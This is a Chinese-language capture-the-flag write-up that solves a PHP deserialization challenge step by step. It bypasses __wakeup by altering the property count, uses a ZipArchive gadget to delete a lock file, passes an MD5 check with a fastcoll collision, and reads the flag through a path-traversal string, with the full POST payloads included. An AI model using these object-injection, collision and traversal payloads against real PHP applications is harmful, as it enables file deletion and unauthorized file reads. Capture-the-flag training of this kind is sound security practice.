打开环境
<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
public $filename;
public $content;
public $me;
function __wakeup(){
$this->me = new Ctf();
}
function __destruct() {
$this->me->open($this->filename,$this->content);
}
}
class Ctf {
function __toString() {
return "die";
}
function open($filename, $content){
if(!file_get_contents("./sandbox/lock.lock")){
echo file_get_contents(substr($_POST['b'],0,30));
die();
}else{
file_put_contents("./sandbox/".md5($filename.time()),$content);
die("or you can guess the final filename?");
}
}
}
if(!isset($_POST['a'])){
highlight_file(__FILE__);
die();
}else{
if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
unserialize($_POST['c']);
}
}
第一步 需要绕过wakeup
然后进这里后 ./sandbox/lock.lock这个文件存在就会到else,我们试试访问这个文件,发现它是存在的,所以到else
else这里很明显是让我们猜文件名
但它文件名又是通过md5加密的
通过运行脚本获取参数然后带入删除文件
<?php
class Jesen {
public $filename = './sandbox/lock.lock';
public $content = 8;
public $me;}
$a = new Jesen();
$zip = new ZipArchive;
$a->me = $zip;
$b = serialize($a);
$b = str_replace('":3:','":4:',$b);
echo $b;
echo "\n";
然后post上传
a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}
这里要利用fastcoll这个工具
fastcoll
./../../../../../../../../flag
这里跑出来两个文件
我还是不太确定是否成功
所以用php脚本检查一下
<?php
function readmyfile($path){
$fh=fopen($path,"rb");
$data=fread($fh,filesize($path));
fclose($fh);
return$data;
}
echo md5( (readmyfile("1.txt")));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5( (readmyfile("2.txt")));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));
运行
发现确实一样
所以可以直接URL编码了
<?php
function readmyfile($path){
$fh=fopen($path,"rb");
$data=fread($fh,filesize($path));
fclose($fh);
return$data;
}
//echo md5( (readmyfile("1.txt")));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5( (readmyfile("2.txt")));
echo '============================';
echo urlencode(readmyfile("2.txt"));
然后有a,b了我们还需要c的值
<?php
class Jesen{
public$filename;
public$content;
public$me;
}
$a = new Jesen();
echo serialize($a);
然后进行post传参就能得到flag了
a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9F%EA%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FFe%A1_%3A%F1Dg%9Fh%858%84%9Fdj%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%9B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%E0%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2iL%8C%F8%BD&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9Fj%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FF%E5%A1_%3A%F1Dg%9Fh%858%84%9Fd%EA%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%1B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%60%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2%E9L%8C%F8%BD&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
解出flag
有什么不清楚可以留言